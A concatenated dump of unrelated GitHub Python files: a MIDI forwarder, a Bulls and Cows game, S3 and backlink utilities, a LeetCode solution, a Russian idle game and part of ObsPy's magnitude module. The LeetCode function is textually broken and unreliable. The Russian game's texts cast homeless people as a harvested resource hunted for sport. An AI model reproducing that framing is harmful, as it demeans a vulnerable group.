(DD/MM/YYY)\n# @Description:\n# This code receive any kind of message received from an external MIDI device (like a Cymatic)\n# Forward the received MIDI message to a loopMIDI channel with an addition MIDI command that trigger\n# the play button on \"LivePrompter\".\n#\n# In this way it keep simple the MIDI programing for the Cymatic, it just trigger a Program Change\n# matched with a ceratin song (in LivePrompter), and ti peace of code include the play command (send by\n# a MIDI Control Change).\n#\n\nimport mido\nimport os\nimport time\nimport sys\n\noutputMIDI='loopMIDI 1' #To LivePrompter\ninputMIDI='emulatore 1' #From Cymatic\ntry:\n outport = mido.open_output(outputMIDI, autoreset=True) #Oper output MIDI port\n inport = mido.open_input(inputMIDI, autoreset=True) #Open input MIDI port\n\n\n\n print('Waiting MIDI message from Cymatic...')\n print()\n msg = inport.receive() # Leggo il messagio dal Cymatic\n\n if msg.type == 'program_change':\n print('Forward:')\n print(msg) # Visualizzo il messaggio ricevuto\n outport.send(msg) # Inoltro il messaggio a Live Prompter\n\n # Play MIDI command\n print('Play command:')\n play = mido.Message('control_change', control=7, value=10) #Play\n print(play)\n outport.send(play)\n\n else:\n print('MIDI message Discarded: not a control_change!')\n\n print() #New line\n\n time.sleep(1)\n \n os.execl(sys.executable, 'python', __file__, *sys.argv[1:]) #Restart program\n\nexcept:\n print('Unable to open MIDI port(s).')\n print('Is the loopMIDI program running?')\n print('Is the MIDI-usb adapter connected?')\n print('Window closing in 10 seconds...')\n time.sleep(10)","repo_name":"paoloros97/AutoPlay_LivePrompter","sub_path":"OldStuff/AutoPlayerOld.py","file_name":"AutoPlayerOld.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"10060002600","text":"from ttkthemes import ThemedStyle\nimport tkinter as tk\nfrom tkinter import ttk, messagebox\nfrom PIL import Image, ImageTk\nimport random\nimport data\nimport images\n\n# Global declarations\nDATA_FILE = \"data/isograms.txt\"\nSETTINGS_FILE = \"data/settings.txt\"\n# End global declarations\n\n\nclass BullsAndCows:\n def __init__(self):\n self.current_word = \"\"\n self.current_guess = \"\"\n self.current_result = \"\"\n self.isogram_list = []\n self.guess_number = 0\n self.max_guesses = 0\n self.max_word_length = 0\n self.min_word_length = 0\n self.get_settings()\n self.load_data_file()\n self.game_running = False\n self.guess_history_items = []\n self.result_history_items = []\n\n def load_data_file(self, debug=False):\n with open(DATA_FILE, \"r\") as file:\n self.isogram_list = file.readlines()\n for i, word in enumerate(self.isogram_list):\n self.isogram_list[i] = word.lower().strip() # sanitize word list\n if debug:\n print(self.isogram_list)\n\n def get_settings(self, debug=False):\n with open(SETTINGS_FILE, \"r\") as file:\n config = file.readlines()\n for setting in config:\n if debug:\n print(setting)\n if \"max_guesses\" in setting:\n self.max_guesses = int(setting.split(\"=\")[1])\n if \"max_word_length\" in setting:\n self.max_word_length = int(setting.split(\"=\")[1])\n if \"min_word_length\" in setting:\n self.min_word_length = int(setting.split(\"=\")[1])\n\n def new_game(self, debug=False):\n self.current_word = \"\"\n self.current_guess = \"\"\n self.current_result = \"\"\n self.isogram_list = []\n self.guess_number = 1\n self.max_guesses = 0\n self.max_word_length = 0\n self.min_word_length = 0\n self.get_settings()\n self.load_data_file()\n self.game_running = True\n for label in self.guess_history_items:\n label.grid_remove()\n for label in self.result_history_items:\n label.grid_remove()\n\n self.current_word = \"\"\n\n while len(self.current_word) < self.min_word_length or len(self.current_word) > self.max_word_length:\n self.current_word = random.choice(self.isogram_list)\n self.max_guesses = len(self.current_word) + 2\n if debug:\n print(len(self.current_word))\n print(self.min_word_length)\n print(self.max_word_length)\n print(self.current_word)\n print(self.guess_number)\n\n self.current_guess = 1\n player_guess_label.config(text=f\"Guess #{self.current_guess} of {self.max_guesses}: \")\n cows_speak_label.config(text=f\"We have chosen a secret word with {len(self.current_word)} characters.\")\n\n def set_result(self, current_guess_number: int, current_guess: str, result: str, debug=False):\n if debug:\n print(self.guess_history_items)\n self.guess_history_items[current_guess_number].config(text=current_guess)\n self.guess_history_items[current_guess_number].grid(pady=5)\n self.result_history_items[current_guess_number].config(text=result)\n self.result_history_items[current_guess_number].grid(pady=5)\n\n @staticmethod\n def split_word(word):\n return [char for char in word]\n\n @staticmethod\n def intersection(lst1, lst2):\n lst3 = [value for value in lst1 if value in lst2]\n return lst3\n\n def make_guess(self):\n if self.game_running:\n self.current_guess = player_guess_entry.get()\n self.current_guess = self.current_guess.lower()\n if len(self.current_guess) == len(self.current_word):\n # print(f\"Current guess number: {self.guess_number} of {self.max_guesses}\")\n\n guess = self.split_word(self.current_guess)\n secret_word = self.split_word(self.current_word)\n intersection = self.intersection(guess, secret_word)\n\n # print(f\"inter = {intersection}\")\n # print(f\"guess = {guess}\")\n results = \"\"\n # print(f\"Secret word len = {len(secret_word)}\")\n for i, letter in enumerate(secret_word):\n # print(i)\n if guess[i] not in intersection:\n results += \"X\"\n continue\n if guess[i] == secret_word[i]:\n results += \"B\"\n continue\n else:\n results += \"C\"\n\n self.set_result(self.guess_number, self.current_guess, str(results))\n\n if self.current_guess == self.current_word:\n if self.play_again(True):\n self.new_game()\n elif self.guess_number >= self.max_guesses:\n # print(\"Player has lost.\")\n if self.play_again(False):\n self.new_game()\n else:\n self.game_running = False\n else:\n self.guess_number += 1\n player_guess_label.config(text=f\"Guess #{self.guess_number} of {self.max_guesses}: \")\n else:\n messagebox.showinfo(message=f\"You gave {len(self.current_guess)} letters instead of {len(self.current_word)}\")\n\n def play_again(self, win_or_lose: str):\n if not win_or_lose:\n return messagebox.askyesno(\n message=f\"Sorry, you loose. The secret word was: {self.current_word} Try again?\",\n icon=\"question\", title=\"Confirm Quit\")\n if win_or_lose:\n return messagebox.askyesno(\n message=f\"\"\"\n Congratulations... You win!\n You got the word: {self.current_word} in {self.guess_number} guesses.\n Play again?\"\"\",\n icon=\"question\", title=\"Confirm Quit\")\n\n @staticmethod\n def about():\n messagebox.showinfo(message=\"\"\"\n Bulls and cows part Moo v1.0 was written in python\n using tkinter. This little pet project was created \n for my wife Dawn, who loved a console version I had \n written years ago. I just thought it was about\n time to give her a modern version :)\"\"\")\n\n @staticmethod\n def how_to_play():\n messagebox.showinfo(message=\"\"\"\n Bulls and cows is a word game where you try to guess\n the secret word of the cows. Every chosen secret\n word is an isogram (meaning no letters are repeated).\n after each guess you will be presented with results\n like 'XCBXXBC' where 'X' means that letter is not in the\n word. A 'C' or cow is given for correct letters but in\n the wrong place. Finally a 'B' or bull is given for\n each correct letter in the right place. You will be\n given a number of tries equal to 2 plus the length\n of the current secret word. Get the word right and\n you win! Good luck!\"\"\")\n\n\ngame = BullsAndCows()\n\nroot = tk.Tk()\nroot.resizable(False, False)\nroot.title(\"Bulls and cows\")\nroot.option_add('*tearOff', False)\n\nstyle = ThemedStyle(root)\n# print(style.get_themes())\nstyle.set_theme(\"plastik\")\n\nmain = ttk.Frame(root)\nmain.grid(row=0, column=0)\n\nmenu_bar = tk.Menu()\nroot.config(menu=menu_bar)\n\nhelp_menu = tk.Menu(menu_bar)\nmenu_bar.add_cascade(menu=help_menu, label=\"Help\")\nhelp_menu.add_command(label=\"About\", command=game.about)\nhelp_menu.add_command(label=\"How to play\", command=game.how_to_play)\n\nlogo_image = Image.open(\"images/Cows.gif\")\nlogo_image = logo_image.resize((300, 300), Image.ANTIALIAS)\nlogo_image = ImageTk.PhotoImage(logo_image)\n\nleft_frame = tk.Frame(main)\ncenter_frame = tk.Frame(main)\nright_frame = tk.Frame(main)\nbottom_frame = tk.Frame(main)\n\nleft_frame.grid(row=0, column=0, sticky=\"sw\", padx=10)\ncenter_frame.grid(row=0, column=1, sticky=\"nsew\")\nright_frame.grid(row=0, column=2, sticky=\"nsew\")\nbottom_frame.grid(row=1, column=0, columnspan=3, sticky=\"nsew\", pady=10)\n\ntitle_label = ttk.Label(center_frame, text=\"Bulls and Cows Part Moo\", anchor=\"center\")\ntitle_label.config(font=(\"Times\", 20))\ntitle_label.grid(row=0, column=0, sticky=\"n\")\n\nmain_image = tk.Label(center_frame, image=logo_image, anchor=\"center\")\nmain_image.image = logo_image\nmain_image.grid(row=1, column=0)\n\ncows_speak_label = ttk.Label(center_frame, text=\"We have not chosen a word yet. Please start game.\")\ncows_speak_label.grid(row=2, column=0)\n\nplayer_frame = tk.Frame(center_frame)\nplayer_guess_label = ttk.Label(player_frame, text=f\"Guess #{game.guess_number} of {game.max_guesses}:\")\nplayer_guess_entry = ttk.Entry(player_frame)\nsubmit_guess_button = ttk.Button(player_frame, text=\"Submit\", command=game.make_guess)\nplayer_frame.grid(row=3, column=0)\nplayer_guess_label.grid(row=0, column=0)\nplayer_guess_entry.grid(row=0, column=1)\nsubmit_guess_button.grid(row=0, column=2)\n\nguess_history_label = ttk.Label(right_frame, text=\"Guesses\", font=\"timesx12\")\nguess_history_label2 = ttk.Label(right_frame, text=\"Results\", font=\"timesx12\")\nguess_history_label.grid(row=0, column=0, padx=10)\nguess_history_label2.grid(row=0, column=1, padx=10)\n\nguess1_history = ttk.Label(right_frame, text=\"\", font=\"timesx8\")\nresult1_history = ttk.Label(right_frame, text=\"\", font=\"timesx8\")\nguess2_history = ttk.Label(right_frame, text=\"\", font=\"timesx8\")\nresult2_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess3_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult3_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess4_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult4_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess5_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult5_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess6_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult6_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess7_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult7_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess8_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult8_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess9_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult9_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess10_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult10_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess11_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult11_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nguess12_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\nresult12_history = ttk.Label(right_frame, text=\"\", font=\"timesx10\")\ngame.guess_history_items.append(guess1_history)\ngame.result_history_items.append(result1_history)\ngame.guess_history_items.append(guess2_history)\ngame.result_history_items.append(result2_history)\ngame.guess_history_items.append(guess3_history)\ngame.result_history_items.append(result3_history)\ngame.guess_history_items.append(guess4_history)\ngame.result_history_items.append(result4_history)\ngame.guess_history_items.append(guess5_history)\ngame.result_history_items.append(result5_history)\ngame.guess_history_items.append(guess6_history)\ngame.result_history_items.append(result6_history)\ngame.guess_history_items.append(guess7_history)\ngame.result_history_items.append(result7_history)\ngame.guess_history_items.append(guess8_history)\ngame.result_history_items.append(result8_history)\ngame.guess_history_items.append(guess9_history)\ngame.result_history_items.append(result9_history)\ngame.guess_history_items.append(guess10_history)\ngame.result_history_items.append(result10_history)\ngame.guess_history_items.append(guess11_history)\ngame.result_history_items.append(result11_history)\ngame.guess_history_items.append(guess12_history)\ngame.result_history_items.append(result12_history)\n\nguess1_history.grid(row=1, column=0)\nresult1_history.grid(row=1, column=1)\nguess2_history.grid(row=2, column=0)\nresult2_history.grid(row=2, column=1)\nguess3_history.grid(row=3, column=0)\nresult3_history.grid(row=3, column=1)\nguess4_history.grid(row=4, column=0)\nresult4_history.grid(row=4, column=1)\nguess5_history.grid(row=5, column=0)\nresult5_history.grid(row=5, column=1)\nguess6_history.grid(row=6, column=0)\nresult6_history.grid(row=6, column=1)\nguess7_history.grid(row=7, column=0)\nresult7_history.grid(row=7, column=1)\nguess8_history.grid(row=8, column=0)\nresult8_history.grid(row=8, column=1)\nguess9_history.grid(row=9, column=0)\nresult9_history.grid(row=9, column=1)\nguess10_history.grid(row=10, column=0)\nresult10_history.grid(row=10, column=1)\nguess10_history.grid(row=11, column=0)\nresult10_history.grid(row=11, column=1)\nguess10_history.grid(row=12, column=0)\nresult10_history.grid(row=12, column=1)\n\n\nnew_game_button = ttk.Button(left_frame, text=\"New Game\", command=game.new_game)\nsettings_button = ttk.Button(left_frame, text=\"Settings\")\nnew_game_button.grid(row=0, column=0)\n# settings_button.grid(row=1, column=0)\n\n\nstatusbar = tk.Label(\n bottom_frame,\n text=f\"data file: {DATA_FILE} loaded. ({len(game.isogram_list)} words.)\",\n bd=1, relief=tk.SUNKEN, anchor=\"se\", width=90)\nstatusbar.grid(row=0, column=0)\n\n\nroot.bind(\"\", lambda event: game.make_guess())\n\n# define window dimensions width and height\nwindow_width = 635\nwindow_height = 415\n\n# get the screen size of computer\nscreen_width = root.winfo_screenwidth()\nscreen_height = root.winfo_screenheight()\n\n# Get the window position from the top dynamically as well as position from left or right as follows\nposition_top = int(screen_height/2 - window_height/2)\nposition_right = int(((screen_width / 2) - 50) - ((window_width / 2) - 50))\n\n# now center that root window!\nroot.geometry(f'{window_width}x{window_height}+{position_right}+{position_top}')\nroot.iconbitmap(r'images/cow.ico')\n\n# game.set_result(1, True)\nroot.mainloop()\n","repo_name":"McGrathSolutions/Bulls_And_Cows_Part_Moo","sub_path":"bulls_and_cows.py","file_name":"bulls_and_cows.py","file_ext":"py","file_size_in_byte":14134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32140684767","text":"import json\n\n\ndef get_next_batch_of_ads_from_s3(s3_client: object, bucket: str, keys: list) -> list:\n if s3_client is None or keys is None or len(keys) == 0:\n return None\n\n ads = []\n\n for key in keys:\n response = s3_client.get_object(Bucket = bucket, Key = key)\n if 'Body' in response:\n ad = json.loads(response['Body'].read().decode('utf-8'))\n ads.append(ad)\n\n return ads\n\n\ndef get_next_batch_of_ad_keys(s3_client: object, bucket: str, prefix: str, max_keys: int = 3, continuation_token: str = None) -> list:\n response = None\n\n if continuation_token:\n response = s3_client.list_objects_v2(\n Bucket = bucket,\n Prefix = prefix,\n MaxKeys = max_keys,\n ContinuationToken = continuation_token\n )\n else:\n response = s3_client.list_objects_v2(\n Bucket = bucket,\n Prefix = prefix,\n MaxKeys = max_keys \n )\n\n keys: list = []\n continuation_token: str = None\n\n if 'Contents' not in response:\n return None, None\n\n for obj in response['Contents']:\n keys.append(obj['Key'])\n \n if 'NextContinuationToken' in response:\n continuation_token = response['NextContinuationToken']\n\n return keys, continuation_token","repo_name":"gutucristian/HTTPAdServer","sub_path":"s3_util.py","file_name":"s3_util.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13563528626","text":"import re\nfrom typing import List\n\nfrom models.backlink import BackLink\nfrom models.link import Link\n\n\nclass BackLinkUtil:\n CONTENT_TEMPLATE = \"<<<<<<< Linked Reference\\n{content}\\n>>>>>>> End\"\n SECTION_PATTERN = r\"<<<<<<< Linked Reference([\\s\\S]*?)>>>>>>> End\"\n GROUP_PATTERN = r\"\\* (.*)((?:\\n \\* .*)+)\"\n\n def __init__(self, task) -> None:\n self.task = task\n self.content = \"\" if task.content is None else task.content\n self._parse_backlink()\n\n def parse_normal_links(self):\n normal_section = re.sub(BackLinkUtil.SECTION_PATTERN, \"\", self.content)\n return Link.parse_links(normal_section)\n\n def _parse_backlink(self):\n backlink_section_obj = re.findall(BackLinkUtil.SECTION_PATTERN, self.content)\n self.backlinks: List[BackLink] = []\n if len(backlink_section_obj) > 0:\n self.backlink_section = backlink_section_obj[0].strip()\n groups = re.findall(BackLinkUtil.GROUP_PATTERN, self.backlink_section)\n for group in groups:\n backlink_str, refers = group\n backlink = BackLink(Link(backlink_str))\n refers = [i for i in refers.split(\" * \") if (i != '\\n' and i != '')]\n for refer in refers:\n backlink.add_whole_line_str(refer.strip())\n self.backlinks.append(backlink)\n\n # print(f'Parse Link fail,link_str is \"{link_str}\", from task: {self.task.title}')\n\n @staticmethod\n def gen_backlink_section(backlinks: List[BackLink]):\n return BackLinkUtil.CONTENT_TEMPLATE.format(\n content=\"\\n\".join([i.gen_single_backlink_str() for i in backlinks])\n )\n","repo_name":"leolulu/dida365-api","sub_path":"utils/backlink_util.py","file_name":"backlink_util.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"70650585580","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def rangeSumBST(self, root, low, high):\n \"\"\"\n :type root: TreeNode\n :type low: int\n :type high: int\n :rtype: int\n \"\"\"\n if root==None:\n return 0;\n sum = 0;\n if(root.vallow:\n sum=sum+self.rangeSumBST(root.left,low,min(high,root.val));\n \n if(root.val<=high and root.val>=low):\n sum=sum+root.val\n \n return sum;","repo_name":"AnujPancholi/codingQuestionSolutions","sub_path":"leetcode/algorithms/tree/range-sum-of-bst.py","file_name":"range-sum-of-bst.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"1202010221","text":"from MyFunctions import *\n\n#Майнер бомжей\nclass BusStation():\n def __init__(self, user):\n self.user = user\n self.tile_to_default()\n self.objects_dict = {}\n self.NxNy = [12,8] #на сколько столбцов и строк резать изображение\n self.img = None\n self.lvl_list = [\n {'lvl': 1, 'cost': 0, 'bums':0, 'limit': 10, 'bps': 0.3, 'bum_cash': 0, 'draw_frame': 2, 'draw_col': 0}, #draw_col = номер группы из четырёх колонок для изменения изображения с уровнем\n {'lvl': 2, 'cost': 100, 'limit': 50, 'bps': 1, 'draw_col': 1},\n {'lvl': 3, 'cost': 1000, 'limit': 100, 'bps': 5, 'draw_col': 2},\n ]\n self.button_dict = [\n {\n 'name': 'LEVEL',\n 'action': self.lvl,\n 'item': self,\n },\n {\n 'name': 'GRAB',\n 'action': self.GrabBums,\n 'item': self,\n },\n ]\n self.button_dict_limited = [\n {\n 'name': 'GRAB',\n 'action': self.GrabBums,\n 'item': self,\n },\n ]\n self.text_dict = {\n 'info_screen': {\n 'body': {\n 'alignment': 'left',\n 'text': ['Уровень: ', 'Бомжи: ', 'Предел бомжей: ']\n },\n 'body_val': {\n 'alignment': 'right',\n 'attr': ['lvl', 'bums', 'limit']\n }\n },\n 'info_annotation': {\n 'header': {\n 'alignment': 'center',\n 'text': 'Остановка'\n },\n 'text': {\n 'alignment': 'left',\n 'text': ['Место респауна бомжей. Прибывают до тех пор, пока не закончится место.']\n },\n },\n 'shop_annotation': {\n 'text': {\n 'alignment': 'left',\n 'text': ['Обычная такая автобусная остановка в трущобах, на которой любят скапливаться бомжи и обблёвывать всё вокруг.']\n },\n },\n }\n '''\n self.info_screen = [\n {'display_name': 'Уровень: ',\n 'attr': 'lvl'},\n {'display_name': 'Бомжи: ',\n 'attr': 'bums'},\n {'display_name': 'Предел бомжей: ',\n 'attr': 'limit'},\n ]'''\n\n def tile_to_default(self):\n self.tile = [\n [1, 1, 1],\n [1, 1, 1],\n [0, 0, 0]\n ]\n self.pivot = [1,1]\n\n def SetNewID(self, item_id):\n self.objects_dict[item_id].update(self.lvl_list[0])\n if self not in self.user.property_list['EUR']:\n self.user.property_list['EUR'].append(self)\n\n def GrabBums(self, item_state):\n item_id = item_state['item_id']\n self.user.resources['bums'] += self.objects_dict[item_id]['bums']\n self.objects_dict[item_id]['bums'] = 0\n\n def lvl(self, item_state):\n new_lvl = self.objects_dict[item_state['item_id']]['lvl']\n self.objects_dict[item_state['item_id']].update(self.lvl_list[new_lvl])\n\n #Проходится по всем своим объектам, считает прибыль\n def resources_update(self):\n for ID in self.objects_dict:\n #По бомжам\n if self.objects_dict[ID]['bums'] < (self.objects_dict[ID]['limit'] - self.objects_dict[ID]['bum_cash'] - self.objects_dict[ID]['bps']):\n self.objects_dict[ID]['bum_cash'] += self.objects_dict[ID]['bps']\n self.objects_dict[ID]['bums'] += int((self.objects_dict[ID]['bum_cash'] // 1))\n self.user.resources['total_bums'] -= int((self.objects_dict[ID]['bum_cash'] // 1))\n self.objects_dict[ID]['bum_cash'] = self.objects_dict[ID]['bum_cash'] % 1\n elif self.objects_dict[ID]['bums'] < self.objects_dict[ID]['limit']:\n self.user.resources['total_bums'] -= int(self.objects_dict[ID]['limit'] - self.objects_dict[ID]['bums'])\n self.objects_dict[ID]['bums'] = self.objects_dict[ID]['limit']\n\n self.objects_dict[ID]['draw_frame'] = 2 + int(self.objects_dict[ID]['bums'] * 5 / self.objects_dict[ID]['limit'])\n\n\n#Потребитель бомжей, майнер денег\nclass ShootingRange():\n def __init__(self, user):\n self.user = user\n self.tile_to_default()\n self.objects_dict = {}\n self.img = None\n self.lvl_list = [\n {'lvl': 1, 'cost': 0, 'bums':0, 'cps': 10, 'bps': 3, 'draw_frame': 2},\n {'lvl': 2, 'cost': 100, 'cps': 50, 'bps': 1},\n {'lvl': 3, 'cost': 1000, 'cps': 100, 'bps': 5},\n ]\n self.button_dict = [\n {\n 'name': 'LEVEL',\n 'action': self.lvl,\n 'item': self,\n }\n ]\n self.button_dict_limited = []\n self.info_screen = [\n {'display_name': 'Уровень: ',\n 'attr': 'lvl'},\n {'display_name': 'Прибыль: ',\n 'attr': 'cps'},\n ]\n\n self.text_dict = {\n 'info_screen': {\n 'body': {\n 'alignment': 'left',\n 'text': ['Уровень: ', 'Прибыль: ']\n },\n 'body_val': {\n 'alignment': 'right',\n 'attr': ['lvl', 'cps']\n }\n },\n 'info_annotation': {\n 'header': {\n 'alignment': 'center',\n 'text': 'Бомжетир'\n },\n 'text': {\n 'alignment': 'left',\n 'text': ['Место потребления бомжей. Производим деньги, уменьшаем запас бомжей']\n },\n },\n 'shop_annotation': {\n 'text': {\n 'alignment': 'left',\n 'text': ['Короче, здесь запускаем в лес бомжей, а олигархи их отстреливают. Бомжей - меньше, олигархи - счатсливы и дают денег.']\n },\n },\n }\n\n def tile_to_default(self):\n self.tile = [\n [1, 1, 1],\n [0, 1, 1],\n [0, 0, 1]\n ]\n self.pivot = [1,1]\n\n def SetNewID(self, item_id):\n self.objects_dict[item_id].update(self.lvl_list[0])\n if self not in self.user.property_list['EUR']:\n self.user.property_list['EUR'].append(self)\n\n def lvl(self, item_state):\n new_lvl = self.objects_dict[item_state['item_id']]['lvl']\n self.objects_dict[item_state['item_id']].update(self.lvl_list[new_lvl])\n\n #Проходится по всем своим объектам, считает прибыль\n def resources_update(self):\n for ID in self.objects_dict:\n #По бомжам\n if self.user.resources['bums'] >= self.objects_dict[ID]['bps']:\n self.user.resources['coins'] += self.objects_dict[ID]['cps']\n self.user.resources['bums'] -= self.objects_dict[ID]['bps']\n\n #Сдвиг кадра в зависимости от наполнения\n self.objects_dict[ID]['draw_frame'] = 5\n\n else:\n self.objects_dict[ID]['draw_frame'] = 2\n\n\n\n\nclass Bum():\n #Все существующие бомжи#\n def __init__(self):\n self.cost = 10 #Цена одного бомжа\n self.amount = 0 #Количество свободных бомжей\n self.efficiency = 1 #Эффективность бомжей\n self.trash = 0 #Счётчик отработанных бомжей\n def buy(self):\n self.amount += 1\n def set(self):\n self.amount -= 1\n\nclass Coins():\n #Деньги игрока\n def __init__(self):\n self.amount = 20\n def income(self, sum): #Прибыль\n self.amount += sum\n def outgo(self, sum): #Расход\n self.amount -= sum\n\n#Игровой процесс пользователя\nclass User():\n def __init__(self):\n self.population = 7444443881\n self.resources = {\n 'total_bums': self.population,\n 'coins': 0,\n 'reputation': 0,\n 'bums': 0,\n 'text_list': ['coins', 'bums', 'reputation', 'total_bums'],\n }\n\n self.sum_coins = 0\n self.sum_bums_news_step = 10\n self.sum_coins_news_step = 10\n\n self.property_list = {\n 'EUR': [],\n }\n\n self.text_dict = {\n 'res_annotation': {\n 'text': {\n 'alignment': 'left',\n 'text': []\n },\n },\n }\n\n self.texts = {\n 'coins': ['Собственно, честно заработанные деньги. Можно тратить ни на что. Они просто есть. А у бомжей нет. Ха-ха.'],\n 'bums': ['Это ваши честно заработанные бомжи. Можете распоряжаться ими, как обычными игровыми ресурсами. Вот типа есть мясо-золото-дерево, а это - бомжи.'],\n 'reputation': ['Репутация. Неизвестно, зачем она сейчас нужна. Просто есть, чего бы нет. Пусть и нулевая.'],\n 'total_bums': ['Население планеты, не являющееся бомжами. Задача - сделать бомжами всех. Для этого нужно много водки и автобусных остановок.'],\n }\n\n def get_news(self, news_obj):\n if self.population - self.resources['total_bums'] > self.sum_bums_news_step:\n news_obj.add_jobs('event2')\n #self.Worker.interface_state['news_event'] = 'event2'\n self.sum_bums_news_step += 50\n if self.sum_coins > self.sum_coins_news_step:\n #self.Worker.interface_state['news_event'] = 'event1'\n news_obj.add_jobs('event1')\n self.sum_coins_news_step += 50\n\n#Просит все свои объекты посчитать поступления\n def resources_update(self):\n for country in self.property_list:\n for obj in self.property_list[country]:\n obj.resources_update()\n","repo_name":"apogudin/BumFarm","sub_path":"Objects.py","file_name":"Objects.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71880191981","text":"from obspy import UTCDateTime\nfrom obspy.core.event.base import (\n _event_type_class_factory, CreationInfo,\n WaveformStreamID, TimeWindow)\nfrom obspy.core.event import ResourceIdentifier\nfrom obspy.core.event.header import (\n AmplitudeCategory, AmplitudeUnit, EvaluationMode, EvaluationStatus,\n ATTRIBUTE_HAS_ERRORS)\n\n\n__Magnitude = _event_type_class_factory(\n \"__Magnitude\",\n class_attributes=[(\"resource_id\", ResourceIdentifier),\n (\"mag\", float, ATTRIBUTE_HAS_ERRORS),\n (\"magnitude_type\", str),\n (\"origin_id\", ResourceIdentifier),\n (\"method_id\", ResourceIdentifier),\n (\"station_count\", int),\n (\"azimuthal_gap\", float),\n (\"evaluation_mode\", EvaluationMode),\n (\"evaluation_status\", EvaluationStatus),\n (\"creation_info\", CreationInfo)],\n class_contains=[\"comments\", \"station_magnitude_contributions\"])\n\n\nclass Magnitude(__Magnitude):\n \"\"\"\n Describes a magnitude which can, but does not need to be associated with an\n origin.\n\n Association with an origin is expressed with the optional attribute\n originID. It is either a combination of different magnitude estimations, or\n it represents the reported magnitude for the given event.\n\n :type resource_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param resource_id: Resource identifier of Magnitude.\n :type force_resource_id: bool, optional\n :param force_resource_id: If set to False, the automatic initialization of\n `resource_id` attribute in case it is not specified will be skipped.\n :type mag: float\n :param mag: Resulting magnitude value from combining values of type\n :class:`~obspy.core.event.magnitude.StationMagnitude`.\n If no estimations are available, this value can represent the\n reported magnitude.\n :type mag_errors: :class:`~obspy.core.event.base.QuantityError`\n :param mag_errors: AttribDict containing error quantities.\n :type magnitude_type: str, optional\n :param magnitude_type: Describes the type of magnitude. This is a free-text\n field because it is impossible to cover all existing magnitude type\n designations with an enumeration. Possible values are:\n\n * unspecified magnitude (``'M'``),\n * local magnitude (``'ML'``),\n * body wave magnitude (``'Mb'``),\n * surface wave magnitude (``'MS'``),\n * moment magnitude (``'Mw'``),\n * duration magnitude (``'Md'``)\n * coda magnitude (``'Mc'``)\n * ``'MH'``, ``'Mwp'``, ``'M50'``, ``'M100'``, etc.\n\n :type origin_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`,\n optional\n :param origin_id: Reference to an origin’s resource_id if the magnitude has\n an associated Origin.\n :type method_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`,\n optional\n :param method_id: Identifies the method of magnitude estimation. Users\n should avoid to give contradictory information in method_id and\n magnitude_type.\n :type station_count: int, optional\n :param station_count: Number of used stations for this magnitude\n computation.\n :type azimuthal_gap: float, optional\n :param azimuthal_gap: Azimuthal gap for this magnitude computation.\n Unit: deg\n :type evaluation_mode: str, optional\n :param evaluation_mode: Evaluation mode of Magnitude.\n See :class:`~obspy.core.event.header.EvaluationMode` for allowed\n values.\n :type evaluation_status: str, optional\n :param evaluation_status: Evaluation status of Magnitude.\n See :class:`~obspy.core.event.header.EvaluationStatus` for allowed\n values.\n :type comments: list of :class:`~obspy.core.event.base.Comment`, optional\n :param comments: Additional comments.\n :type station_magnitude_contributions: list of\n :class:`~obspy.core.event.magnitude.StationMagnitudeContribution`.\n :param station_magnitude_contributions: StationMagnitudeContribution\n instances associated with the Magnitude.\n :type creation_info: :class:`~obspy.core.event.base.CreationInfo`, optional\n :param creation_info: Creation information used to describe author,\n version, and creation time.\n\n .. note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\n__StationMagnitude = _event_type_class_factory(\n \"__StationMagnitude\",\n class_attributes=[(\"resource_id\", ResourceIdentifier),\n (\"origin_id\", ResourceIdentifier),\n (\"mag\", float, ATTRIBUTE_HAS_ERRORS),\n (\"station_magnitude_type\", str),\n (\"amplitude_id\", ResourceIdentifier),\n (\"method_id\", ResourceIdentifier),\n (\"waveform_id\", WaveformStreamID),\n (\"creation_info\", CreationInfo)],\n class_contains=[\"comments\"])\n\n\nclass StationMagnitude(__StationMagnitude):\n \"\"\"\n This class describes the magnitude derived from a single waveform stream.\n\n :type resource_id:\n 